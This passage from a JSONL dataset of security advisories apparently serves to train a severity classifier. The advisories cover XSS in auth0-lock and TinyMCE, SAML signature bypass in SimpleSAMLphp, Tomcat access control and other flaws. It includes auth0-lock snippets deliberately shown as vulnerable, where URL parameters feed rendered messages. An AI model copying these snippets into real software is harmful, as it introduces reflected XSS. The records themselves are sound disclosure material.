`script` tags or `onclick` attributes, these will be removed.", "text_raw": "Reflected XSS when using flashMessages or languageDictionary\n\n[Severity: HIGH]\n\n### Overview\n\nVersions before and including `11.30.0` are vulnerable to reflected XSS. An attacker can execute arbitrary code when the library's\n- `flashMessage` feature is utilized and user input or data from URL parameters is incorporated into the `flashMessage`.\n- `languageDictionary` feature is utilized and user input or data from URL parameters is incorporated into the `languageDictionary`.\n\n### Am I affected?\nYou are affected by this vulnerability if you are using `auth0-lock` version `11.30.0` or lower and all of the following conditions apply:\n\n- You are utilizing `flashMessage` feature.\n- User input or data from URL parameters is incorporated into the `flashMessage`.\n\nAn example of a vulnerable snippet where query parameters are used to populate the `text` property of a `flashMessage`.\n```js\nvar params = new URLSearchParams(location.search);\nvar errorMessage = params.get('error__message');\nvar showParams = {};\n\nif (!!errorMessage === true) {\n showParams.flashMessage = {\n type: 'error',\n text: 'We were unable to log you in. ' + errorMessage,\n };\n}\n\nlock.show(showParams);\n```\n\nOR\n\n- You are utilizing `languageDictionary` feature.\n- User input or data from URL parameters is used in `languageDictionary` properties.\n\nAn example of a vulnerable snippet where query parameters are used to populate the `socialLoginInstructions` property of a `languageDictionary`.\n```js\nvar params = new URLSearchParams(location.search);\nvar instruction = params.get('instruction');\n\nvar options = {\n languageDictionary: {\n emailInputPlaceholder: \"something@youremail.com\",\n title: \"title\",\n socialLoginInstructions: instruction\n },\n};\n\nvar lock = new Auth0LockPasswordless(\n CLIENT_ID,\n DOMAIN,\n options\n);\n\nlock.show()\n```\n\n### How to fix that?\nUpgrade to version `11.30.1`.\n\n### Will this update impact my users?\nThe fix uses [DOMPurify](https://github.com/cure53/DOMPurify) to sanitise the `flashMessage` and `languageDictionary` inputs. If you are including inline JavaScript in these fields, like `script` tags or `onclick` attributes, these will be removed.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-06-04", "split": "train"} -{"id": "94b85700b52e37509f42", "text": "Billion laughs attack in c3p0\n\nc3p0 version < 0.9.5.4 may be exploited by a billion laughs attack when loading XML configuration due to missing protections against recursive entity expansion when loading configuration.", "text_raw": "Billion laughs attack in c3p0\n\n[Severity: HIGH]\n\nc3p0 version < 0.9.5.4 may be exploited by a billion laughs attack when loading XML configuration due to missing protections against recursive entity expansion when loading configuration.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-04-23", "split": "train"} -{"id": "5c193ae9889384f2ceba", "text": "Insecure permissions on build temporary rootfs in Singularity\n\n### Impact\n\nInsecure permissions on temporary directories used in explicit and implicit container build operations.\n\nWhen a Singularity command that results in a container build operation is executed, it is possible for a user with access to the system to read the contents of the image during the build. Additionally, if the image contains a world-writable file or directory, it is possible for a user to inject arbitrary content into the running build, which in certain circumstances may enable arbitrary code execution during the build and/or when the built container is run.\n\n### Patches\n\nThis issue is addressed in Singularity 3.6.3.\n\nAll users are advised to upgrade to 3.6.3.\n\n### Workarounds\n\nThe issue is mitigated if `TMPDIR` is set to a location that is only accessible to the user, as any subdirectories directly under `TMPDIR` cannot then be accessed by others. However, this is difficult to enforce so it is not recommended to rely on this as a mitigation.\n\n### For more information\n\nGeneral questions about the impact of the advisory / changes made in the 3.6.0 release can be asked in the:\n\n* [Singularity Slack Channel](https://bit.ly/2m0g3lX)\n* [Singularity Mailing List](https://groups.google.com/a/lbl.gov/forum/??sdf%7Csort:date#!forum/singularity)\n\nAny sensitive security concerns should be directed to: security@sylabs.io\n\nSee our Security Policy here: https://sylabs.io/security-policy", "text_raw": "Insecure permissions on build temporary rootfs in Singularity\n\n[Severity: HIGH]\n\n### Impact\n\nInsecure permissions on temporary directories used in explicit and implicit container build operations.\n\nWhen a Singularity command that results in a container build operation is executed, it is possible for a user with access to the system to read the contents of the image during the build. Additionally, if the image contains a world-writable file or directory, it is possible for a user to inject arbitrary content into the running build, which in certain circumstances may enable arbitrary code execution during the build and/or when the built container is run.\n\n### Patches\n\nThis issue is addressed in Singularity 3.6.3.\n\nAll users are advised to upgrade to 3.6.3.\n\n### Workarounds\n\nThe issue is mitigated if `TMPDIR` is set to a location that is only accessible to the user, as any subdirectories directly under `TMPDIR` cannot then be accessed by others. However, this is difficult to enforce so it is not recommended to rely on this as a mitigation.\n\n### For more information\n\nGeneral questions about the impact of the advisory / changes made in the 3.6.0 release can be asked in the:\n\n* [Singularity Slack Channel](https://bit.ly/2m0g3lX)\n* [Singularity Mailing List](https://groups.google.com/a/lbl.gov/forum/??sdf%7Csort:date#!forum/singularity)\n\nAny sensitive security concerns should be directed to: security@sylabs.io\n\nSee our Security Policy here: https://sylabs.io/security-policy", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-24", "split": "train"} -{"id": "0a07a989818f81d7b1fb", "text": "Potential Denial-of-Service in bindata\n\nIn the bindata RubyGem before version 2.4.10 there is a potential denial-of-service vulnerability. In affected versions it is very slow for certain classes in BinData to be created. For example `BinData::Bit100000`, `BinData::Bit100001`, `BinData::Bit100002`, `BinData::Bit`. In combination with `.constantize` there is a potential for a CPU-based DoS. In version 2.4.10, bindata improved the creation time of Bits and Integers.", "text_raw": "Potential Denial-of-Service in bindata\n\n[Severity: MEDIUM]\n\nIn the bindata RubyGem before version 2.4.10 there is a potential denial-of-service vulnerability. In affected versions it is very slow for certain classes in BinData to be created. For example `BinData::Bit100000`, `BinData::Bit100001`, `BinData::Bit100002`, `BinData::Bit`. In combination with `.constantize` there is a potential for a CPU-based DoS. In version 2.4.10, bindata improved the creation time of Bits and Integers.\n\n", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-06-23", "split": "train"} -{"id": "42231adf639cea60cebe", "text": "Improper Authorization in googleapis\n\nVersions of `googleapis` prior to 39.1.0 are vulnerable to Improper Authorization. Setting credentials to one client may apply to all clients which may cause requests to be sent with the incorrect credentials.\n\n## Recommendation\n\nUpgrade to version 39.1.0.", "text_raw": "Improper Authorization in googleapis\n\n[Severity: HIGH]\n\nVersions of `googleapis` prior to 39.1.0 are vulnerable to Improper Authorization. Setting credentials to one client may apply to all clients which may cause requests to be sent with the incorrect credentials.\n\n\n## Recommendation\n\nUpgrade to version 39.1.0.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-02", "split": "train"} -{"id": "c56abe6337806a1ad320", "text": "Arbitrary command execution in roar-pidusage\n\nThis affects all current versions of package roar-pidusage. If attacker-controlled user input is given to the stat function of this package on certain operating systems, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization.", "text_raw": "Arbitrary command execution in roar-pidusage\n\n[Severity: MEDIUM]\n\nThis affects all current versions of package roar-pidusage. If attacker-controlled user input is given to the stat function of this package on certain operating systems, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-05-06", "split": "train"} -{"id": "da01c424e0b2348694e2", "text": "Go Pro Fusion Studio 1.2 Privilege Escalation", "text_raw": "Go Pro Fusion Studio 1.2 Privilege Escalation\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2018-09-04", "split": "train"} -{"id": "9b6d2cb3b7f80496413c", "text": "Multiple cryptographic issues in Python oic\n\n### Impact\n* Client implementations using this library\n\n### Issues\n1) The IdToken signature algorithm was not checked automatically, but only if the expected algorithm was passed in as a kwarg.\n2) JWA `none` algorithm was allowed in all flows.\n3) `oic.consumer.Consumer.parse_authz` returns an unverified IdToken. The verification of the token was left to the discretion of the implementator.\n4) `iat` claim was not checked for sanity (i.e. it could be in the future)\n\n### Patches\n1) IdToken signature is now always checked.\n2) JWA `none` algorithm is now allowed only if using the `response_type` `code`\n3) IdToken verification is now done automatically.\n4) `iat` claim is now checked for sanity.", "text_raw": "Multiple cryptographic issues in Python oic\n\n[Severity: HIGH]\n\n### Impact\n* Client implementations using this library\n\n### Issues\n1) The IdToken signature algorithm was not checked automatically, but only if the expected algorithm was passed in as a kwarg.\n2) JWA `none` algorithm was allowed in all flows.\n3) `oic.consumer.Consumer.parse_authz` returns an unverified IdToken. The verification of the token was left to the discretion of the implementator.\n4) `iat` claim was not checked for sanity (i.e. it could be in the future)\n\n### Patches\n1) IdToken signature is now always checked.\n2) JWA `none` algorithm is now allowed only if using the `response_type` `code`\n3) IdToken verification is now done automatically.\n4) `iat` claim is now checked for sanity.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-12-04", "split": "train"} -{"id": "76e8b59506915fd979b6", "text": "Cross-site scripting vulnerability in TinyMCE\n\n### Impact\nA cross-site scripting (XSS) vulnerability was discovered in the URL sanitization logic of the core parser. The vulnerability allowed arbitrary JavaScript execution when inserting a specially crafted piece of content into the editor using the clipboard or APIs. This impacts all users who are using TinyMCE 5.5.1 or lower.\n\n### Patches\nThis vulnerability has been patched in TinyMCE 5.6.0 by improved URL sanitization logic.\n\n### Workarounds\nTo work around this vulnerability, either:\n- Upgrade to TinyMCE 5.6.0 or higher\n- Manually sanitize `iframe`, `object` and `embed` URL attributes using a [TinyMCE node filter](https://www.tiny.cloud/docs/api/tinymce.html/tinymce.html.domparser/#addnodefilter).\n- Disable `iframe`, `object`, and `embed` elements in your content using the [invalid_elements](https://www.tiny.cloud/docs/configure/content-filtering/#invalid_elements) setting.\n\n#### Example: Sanitizing using a node filter\n```js\neditor.parser.addNodeFilter('iframe,object,embed', function(nodes) {\n nodes.forEach(function(node) {\n if (node.attributes) {\n node.attributes.forEach(function(attr) {\n var name = attr.name;\n var value = attr.value;\n // Sanitize the attribute value here or remove it entirely\n var sanitizedValue = ...;\n node.attr(name, santizedValue);\n });\n }\n });\n});\n```\n\n#### Example: Using invalid_elements\n```js\ninvalid_elements: 'iframe,object,embed'\n```\n\n### Acknowledgements\nTiny Technologies would like to thank Aaron Bishop at SecurityMetrics for discovering this vulnerability.\n\n### References\nhttps://www.tiny.cloud/docs/release-notes/release-notes56/#securityfixes\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in the [TinyMCE repo](https://github.com/tinymce/tinymce/issues)\n* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)", "text_raw": "Cross-site scripting vulnerability in TinyMCE\n\n[Severity: MEDIUM]\n\n### Impact\nA cross-site scripting (XSS) vulnerability was discovered in the URL sanitization logic of the core parser. The vulnerability allowed arbitrary JavaScript execution when inserting a specially crafted piece of content into the editor using the clipboard or APIs. This impacts all users who are using TinyMCE 5.5.1 or lower.\n\n### Patches\nThis vulnerability has been patched in TinyMCE 5.6.0 by improved URL sanitization logic.\n\n### Workarounds\nTo work around this vulnerability, either:\n- Upgrade to TinyMCE 5.6.0 or higher\n- Manually sanitize `iframe`, `object` and `embed` URL attributes using a [TinyMCE node filter](https://www.tiny.cloud/docs/api/tinymce.html/tinymce.html.domparser/#addnodefilter).\n- Disable `iframe`, `object`, and `embed` elements in your content using the [invalid_elements](https://www.tiny.cloud/docs/configure/content-filtering/#invalid_elements) setting.\n\n#### Example: Sanitizing using a node filter\n```js\neditor.parser.addNodeFilter('iframe,object,embed', function(nodes) {\n nodes.forEach(function(node) {\n if (node.attributes) {\n node.attributes.forEach(function(attr) {\n var name = attr.name;\n var value = attr.value;\n // Sanitize the attribute value here or remove it entirely\n var sanitizedValue = ...;\n node.attr(name, santizedValue);\n });\n }\n });\n});\n```\n\n#### Example: Using invalid_elements\n```js\ninvalid_elements: 'iframe,object,embed'\n```\n\n### Acknowledgements\nTiny Technologies would like to thank Aaron Bishop at SecurityMetrics for discovering this vulnerability.\n\n### References\nhttps://www.tiny.cloud/docs/release-notes/release-notes56/#securityfixes\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in the [TinyMCE repo](https://github.com/tinymce/tinymce/issues)\n* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-01-06", "split": "train"} -{"id": "fa0d651a360198547f5c", "text": "XML External Entity injection in Apache Camel\n\nApache Camel prior to 2.24.0 contains an XML external entity injection (XXE) vulnerability (CWE-611) due to using an outdated vulnerable JSON-lib library. This affects only the camel-xmljson component, which was removed.", "text_raw": "XML External Entity injection in Apache Camel\n\n[Severity: HIGH]\n\nApache Camel prior to 2.24.0 contains an XML external entity injection (XXE) vulnerability (CWE-611) due to using an outdated vulnerable JSON-lib library. This affects only the camel-xmljson component, which was removed.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-05-29", "split": "train"} -{"id": "cc59d033eca292fde381", "text": "Yealink Device Management Server-Side Request Forgery (SSRF) Vulnerability\n\nAffected: Yealink Device Management\n\nYealink Device Management contains a server-side request forgery (SSRF) vulnerability that allows for unauthenticated remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-78\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Yealink Device Management Server-Side Request Forgery (SSRF) Vulnerability\n\nAffected: Yealink Device Management\n\nYealink Device Management contains a server-side request forgery (SSRF) vulnerability that allows for unauthenticated remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-78\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "39a210e364cfb9c41668", "text": "Ability to expose data in Sylius by using an unintended serialisation group\n\n### Impact\n\nResourceBundle accepts and uses any serialisation groups to be passed via a HTTP header. This might lead to data exposure by using an unintended serialisation group - for example it could make Shop API use a more permissive group from Admin API.\n\nAnyone exposing an API with ResourceBundle's controller is affected. The vulnerable versions are: `<1.3 || >=1.3.0 <=1.3.12 || >=1.4.0 <=1.4.5 || >=1.5.0 <=1.5.0 || >=1.6.0 <=1.6.2`.\n\n### Patches\n\nThe patch is provided for ResourceBundle 1.3.13, 1.4.6, 1.5.1 and 1.6.3, but not for any versions below 1.3.\n\nAfter it is applied, It allows to choose only the groups that are defined in `serialization_groups` or `allowed_serialization_groups` route definition. Any group not defined in those will not be used.\n\nThis behaviour might be a BC break for those using custom groups via the HTTP header, please adjust `allowed_serialization_groups` accordingly.\n\n### Workarounds\n\nService `sylius.resource_controller.request_configuration_factory` can be overridden with an implementation copied from `\\Sylius\\Bundle\\ResourceBundle\\Controller\\RequestConfigurationFactory` where the part that handles custom serialisation groups is deleted.", "text_raw": "Ability to expose data in Sylius by using an unintended serialisation group\n\n[Severity: MEDIUM]\n\n### Impact\n\nResourceBundle accepts and uses any serialisation groups to be passed via a HTTP header. This might lead to data exposure by using an unintended serialisation group - for example it could make Shop API use a more permissive group from Admin API.\n\nAnyone exposing an API with ResourceBundle's controller is affected. The vulnerable versions are: `<1.3 || >=1.3.0 <=1.3.12 || >=1.4.0 <=1.4.5 || >=1.5.0 <=1.5.0 || >=1.6.0 <=1.6.2`.\n\n### Patches\n\nThe patch is provided for ResourceBundle 1.3.13, 1.4.6, 1.5.1 and 1.6.3, but not for any versions below 1.3.\n\nAfter it is applied, It allows to choose only the groups that are defined in `serialization_groups` or `allowed_serialization_groups` route definition. Any group not defined in those will not be used.\n\nThis behaviour might be a BC break for those using custom groups via the HTTP header, please adjust `allowed_serialization_groups` accordingly.\n\n### Workarounds\n\nService `sylius.resource_controller.request_configuration_factory` can be overridden with an implementation copied from `\\Sylius\\Bundle\\ResourceBundle\\Controller\\RequestConfigurationFactory` where the part that handles custom serialisation groups is deleted.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-01-31", "split": "train"} -{"id": "8fc49fc81ab88226300e", "text": "Incorrect signature verification in SimpleSAMLphp\n\n### Background\nAn incorrect check of return values in the signature validation utilities allows an attacker to get invalid signatures accepted as valid by forcing an error during validation.\n\n### Description\nThe `SimpleSAML_XML_Validator` class allows the verification of the XML digital signature of a SAML 1 message with a given key. In particular, the constructor of the class receives an XML node and a key to verify it and throws an exception in case there is an error, either caused by incorrect input or an invalid signature. This method uses the `verify()` method from the `RobRichards\\XMLSecDSig` class to verify the signature with the given key, which in turn will end up calling `openssl_verify()` depending on the signature algorithm used.\n\nThe `openssl_verify()` function returns `1` when the signature was successfully verified, `0` if it failed to verify with the given key and `-1` in case an error occurs. PHP allows translating numerical values to boolean implicitly, with the following correspondences:\n\n- `0` equals `false`\n- Non-zero equals `true`\n\nThis means that an implicit conversion to _boolean_ of the values returned by `openssl_verify()` will convert an error state, signaled by the value `-1`, to successful verification of the signature (represented by the _boolean_ `true`).\n\nThe aforementioned constructor was performing an implicit conversion to boolean of the values returned by the `verify()` method, which subsequently will return the same output as `openssl_verify()` under most circumstances. This means an error during signature verification is treated as a successful verification by the method.\n\n### Affected versions\nAll SimpleSAMLphp versions prior to **1.14.11**.\n\n### Impact\nUpon successful exploitation, an invalid signature would be regarded as valid by an affected version of the software. This allows attackers to modify or manually craft **SAML 1 response messages** and, by triggering a signature validation error in the affected party, get those messages accepted as valid and coming from a trusted entity. In practice, this means full capabilities to impersonate any individual at a given service provider.\n\nThe issue can be exploited to get other invalid messages accepted as valid, though the security implications there are minor.\n\nIn order to exploit the issue, **SAML 1.1 metadata must be registered by the vulnerable Service Provider for the Identity Provider targeted by the attacker** (in `metadata/shib13-idp-remote.php`), and an incorrect context must be fed to the signature validation routines, or an exceptional error must be triggered. So far, the following cases have been identified:\n\n- Using a DSA public key to validate an XML signature made with an RSA-related algorithm.\n- Using an RSA public key to validate an XML signature made with a DSA-related algorithm.\n- Exhausting available memory while verifying the signature.\n\nSimpleSAMLphp **does not support DSA signatures or keys**. Therefore, it is not possible for an attacker to feed an incorrect context by sending a signature with an incorrect algorithm. Upon reception of a DSA-SHA1 signature, SimpleSAMLphp will refuse to perform the validation due to the algorithm not being supported. On the other hand, if an attacker manages to trick a service provider operator to change the public key associated to a certain IdP to a DSA key, signatures made with any combination of the RSA algorithm will be accepted, regardless of whether they are valid or not. This means some serious misconfiguration or social engineering is needed in this case for a successful attack.\n\nRegarding memory exhaustion, it is in theory possible to attack a service provider causing the consumption of all available memory while a message with an invalid signature is being validated. However, memory exhaustion must happen only during signature validation and not immediately before or after. This means exploitation of this case is extremely difficult due to the small time window available for the attacker and the precise control that ", "text_raw": "Incorrect signature verification in SimpleSAMLphp\n\n[Severity: MEDIUM]\n\n### Background\nAn incorrect check of return values in the signature validation utilities allows an attacker to get invalid signatures accepted as valid by forcing an error during validation.\n\n### Description\nThe `SimpleSAML_XML_Validator` class allows the verification of the XML digital signature of a SAML 1 message with a given key. In particular, the constructor of the class receives an XML node and a key to verify it and throws an exception in case there is an error, either caused by incorrect input or an invalid signature. This method uses the `verify()` method from the `RobRichards\\XMLSecDSig` class to verify the signature with the given key, which in turn will end up calling `openssl_verify()` depending on the signature algorithm used.\n\nThe `openssl_verify()` function returns `1` when the signature was successfully verified, `0` if it failed to verify with the given key and `-1` in case an error occurs. PHP allows translating numerical values to boolean implicitly, with the following correspondences:\n\n- `0` equals `false`\n- Non-zero equals `true`\n\nThis means that an implicit conversion to _boolean_ of the values returned by `openssl_verify()` will convert an error state, signaled by the value `-1`, to successful verification of the signature (represented by the _boolean_ `true`).\n\nThe aforementioned constructor was performing an implicit conversion to boolean of the values returned by the `verify()` method, which subsequently will return the same output as `openssl_verify()` under most circumstances. This means an error during signature verification is treated as a successful verification by the method.\n\n### Affected versions\nAll SimpleSAMLphp versions prior to **1.14.11**.\n\n### Impact\nUpon successful exploitation, an invalid signature would be regarded as valid by an affected version of the software. This allows attackers to modify or manually craft **SAML 1 response messages** and, by triggering a signature validation error in the affected party, get those messages accepted as valid and coming from a trusted entity. In practice, this means full capabilities to impersonate any individual at a given service provider.\n\nThe issue can be exploited to get other invalid messages accepted as valid, though the security implications there are minor.\n\nIn order to exploit the issue, **SAML 1.1 metadata must be registered by the vulnerable Service Provider for the Identity Provider targeted by the attacker** (in `metadata/shib13-idp-remote.php`), and an incorrect context must be fed to the signature validation routines, or an exceptional error must be triggered. So far, the following cases have been identified:\n\n- Using a DSA public key to validate an XML signature made with an RSA-related algorithm.\n- Using an RSA public key to validate an XML signature made with a DSA-related algorithm.\n- Exhausting available memory while verifying the signature.\n\nSimpleSAMLphp **does not support DSA signatures or keys**. Therefore, it is not possible for an attacker to feed an incorrect context by sending a signature with an incorrect algorithm. Upon reception of a DSA-SHA1 signature, SimpleSAMLphp will refuse to perform the validation due to the algorithm not being supported. On the other hand, if an attacker manages to trick a service provider operator to change the public key associated to a certain IdP to a DSA key, signatures made with any combination of the RSA algorithm will be accepted, regardless of whether they are valid or not. This means some serious misconfiguration or social engineering is needed in this case for a successful attack.\n\nRegarding memory exhaustion, it is in theory possible to attack a service provider causing the consumption of all available memory while a message with an invalid signature is being validated. However, memory exhaustion must happen only during signature validation and not immediately before or after. This means exploitation of this case is extremely difficult due to the small time window available for the attacker and the p", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-01-24", "split": "train"} -{"id": "0618e34527b271e85cfa", "text": "Apache Tomcat unauthorized access vulnerability\n\nThe URL pattern of \"\" (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected.", "text_raw": "Apache Tomcat unauthorized access vulnerability\n\n[Severity: MEDIUM]\n\nThe URL pattern of \"\" (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-10-17", "split": "train"} -{"id": "23dbd0b2be0770edaa39", "text": "Headers containing newline characters can split messages in hyper\n\nSerializing of headers to the socket did not filter the values for newline bytes (\\r or \\n), which allowed for header values to split a request or response. People would not likely include newlines in the headers in their own applications, so the way for most people to exploit this is if an application constructs headers based on unsanitized user input.\n\nThis issue was fixed by replacing all newline characters with a space during serialization of a header value.", "text_raw": "Headers containing newline characters can split messages in hyper\n\n[Severity: MEDIUM]\n\nSerializing of headers to the socket did not filter the values for newline bytes (\\r or \\n), which allowed for header values to split a request or response. People would not likely include newlines in the headers in their own applications, so the way for most people to exploit this is if an application constructs headers based on unsanitized user input.\n\nThis issue was fixed by replacing all newline characters with a space during serialization of a header value.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "9b14a6fa1aaf7f569867", "text": "Out-of-bounds Write in OpenCV\n\nIn opencv calls that use libpng, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges required. User interaction is not required for exploitation. Product: AndroidVersions: Android-10Android ID: A-110986616", "text_raw": "Out-of-bounds Write in OpenCV\n\n[Severity: HIGH]\n\nIn opencv calls that use libpng, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges required. User interaction is not required for exploitation. Product: AndroidVersions: Android-10Android ID: A-110986616", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-10-12", "split": "train"} -{"id": "7cfc595d7993da866a6c", "text": "Use of Insufficiently Random Values in penggle:kaptcha\n\ntext/impl/DefaultTextCreator.java, text/impl/ChineseTextProducer.java, and text/impl/FiveLetterFirstNameTextCreator.java in kaptcha 2.3.2 use the Random (rather than SecureRandom) function for generating CAPTCHA values, which makes it easier for remote attackers to bypass intended access restrictions via a brute-force approach.", "text_raw": "Use of Insufficiently Random Values in penggle:kaptcha\n\n[Severity: CRITICAL]\n\ntext/impl/DefaultTextCreator.java, text/impl/ChineseTextProducer.java, and text/impl/FiveLetterFirstNameTextCreator.java in kaptcha 2.3.2 use the Random (rather than SecureRandom) function for generating CAPTCHA values, which makes it easier for remote attackers to bypass intended access restrictions via a brute-force approach.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-10-23", "split": "train"} -{"id": "c1e0a8fa774a165c6188", "text": "Django Incorrect Default Permissions\n\nAn issue was discovered in Django 2.2 before 2.2.16, 3.0 before 3.0.10, and 3.1 before 3.1.1 (when Python 3.7+ is used). The intermediate-level directories of the filesystem cache had the system's standard umask rather than 0o077.", "text_raw": "Django Incorrect Default Permissions\n\n[Severity: MEDIUM]\n\nAn issue was discovered in Django 2.2 before 2.2.16, 3.0 before 3.0.10, and 3.1 before 3.1.1 (when Python 3.7+ is used). The intermediate-level directories of the filesystem cache had the system's standard umask rather than 0o077.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-03-18", "split": "train"} -{"id": "40b4dfc717d2b57e86bc", "text": "Allocation of Resources Without Limits or Throttling in Undertow\n\nA flaw was discovered in Undertow in versions before Undertow 2.1.1.Final where certain requests to the \"Expect: 100-continue\" header may cause an out of memory error. This flaw may potentially lead to a denial of service.", "text_raw": "Allocation of Resources Without Limits or Throttling in Undertow\n\n[Severity: HIGH]\n\nA flaw was discovered in Undertow in versions before Undertow 2.1.1.Final where certain requests to the \"Expect: 100-continue\" header may cause an out of memory error. This flaw may potentially lead to a denial of service.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-04-30", "split": "train"} -{"id": "b54bab4b35ec3de5b016", "text": "Context isolation bypass via Promise in Electron\n\n### Impact\nApps using `contextIsolation` are affected.\n\nThis is a context isolation bypass, meaning that code running in the main world context in the renderer can reach into the isolated Electron context and perform privileged actions.\n\n### Workarounds\nThere are no app-side workarounds, you must update your Electron version to be protected.\n\n### Fixed Versions\n* `9.0.0-beta.21`\n* `8.2.4`\n* `7.2.4`\n* `6.1.11`\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [security@electronjs.org](mailto:security@electronjs.org)", "text_raw": "Context isolation bypass via Promise in Electron\n\n[Severity: LOW]\n\n### Impact\nApps using `contextIsolation` are affected.\n\nThis is a context isolation bypass, meaning that code running in the main world context in the renderer can reach into the isolated Electron context and perform privileged actions.\n\n### Workarounds\nThere are no app-side workarounds, you must update your Electron version to be protected.\n\n### Fixed Versions\n* `9.0.0-beta.21`\n* `8.2.4`\n* `7.2.4`\n* `6.1.11`\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [security@electronjs.org](mailto:security@electronjs.org)", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2020-07-07", "split": "train"} -{"id": "d6ae7fc293adbbb5edc8", "text": "An issue in Atomix v3.1.5 allows unauthorized Atomix nodes to become the lead node.\n\nAn issue in Atomix v3.1.5 allows unauthorized Atomix nodes to become the lead node in a target cluster via manipulation of the variable terms in RaftContext.", "text_raw": "An issue in Atomix v3.1.5 allows unauthorized Atomix nodes to become the lead node.\n\n[Severity: HIGH]\n\nAn issue in Atomix v3.1.5 allows unauthorized Atomix nodes to become the lead node in a target cluster via manipulation of the variable terms in RaftContext.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-12-17", "split": "train"} -{"id": "da740b58b5e4b2af9c61", "text": "Out of bounds write in calamine\n\nAn issue was discovered in the calamine crate before 0.17.0 for Rust. It allows attackers to overwrite heap-memory locations because Vec::set_len is used without proper memory claiming, and this uninitialized memory is used for a user-provided Read operation, as demonstrated by Sectors::get.", "text_raw": "Out of bounds write in calamine\n\n[Severity: CRITICAL]\n\nAn issue was discovered in the calamine crate before 0.17.0 for Rust. It allows attackers to overwrite heap-memory locations because Vec::set_len is used without proper memory claiming, and this uninitialized memory is used for a user-provided Read operation, as demonstrated by Sectors::get.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "9056278466cbf6135bbb", "text": "Rails actionpack gem vulnerable to Cross-site Scripting\n\nMultiple cross-site scripting (XSS) vulnerabilities in the `mail_to` helper in Ruby on Rails before 2.3.11, and 3.x before 3.0.4, when javascript encoding is used, allow remote attackers to inject arbitrary web script or HTML via a crafted (1) name or (2) email value.", "text_raw": "Rails actionpack gem vulnerable to Cross-site Scripting\n\n[Severity: MEDIUM]\n\nMultiple cross-site scripting (XSS) vulnerabilities in the `mail_to` helper in Ruby on Rails before 2.3.11, and 3.x before 3.0.4, when javascript encoding is used, allow remote attackers to inject arbitrary web script or HTML via a crafted (1) name or (2) email value.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "a922afb7edffc865bfb6", "text": "Cross-Site Scripting in htmr\n\nVersions of `htmr` prior to 0.8.7 are vulnerable to Cross-Site Scripting (XSS). The package uses `innerHTML` to unescape HTML entities. This may lead to [DOM-based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS) through HTML-encoded XSS payloads. This may allow an attacker to execute arbitrary JavaScript in a victim's browser.\n\n## Recommendation\n\nUpgrade to version 0.8.7 or later.", "text_raw": "Cross-Site Scripting in htmr\n\n[Severity: HIGH]\n\nVersions of `htmr` prior to 0.8.7 are vulnerable to Cross-Site Scripting (XSS). The package uses `innerHTML` to unescape HTML entities. This may lead to [DOM-based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS) through HTML-encoded XSS payloads. This may allow an attacker to execute arbitrary JavaScript in a victim's browser.\n\n\n## Recommendation\n\nUpgrade to version 0.8.7 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "f8bf4f6500c54b6eda59", "text": "Cross-Site Scripting in min-http-server\n\nAll versions of `min-http-server` are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize 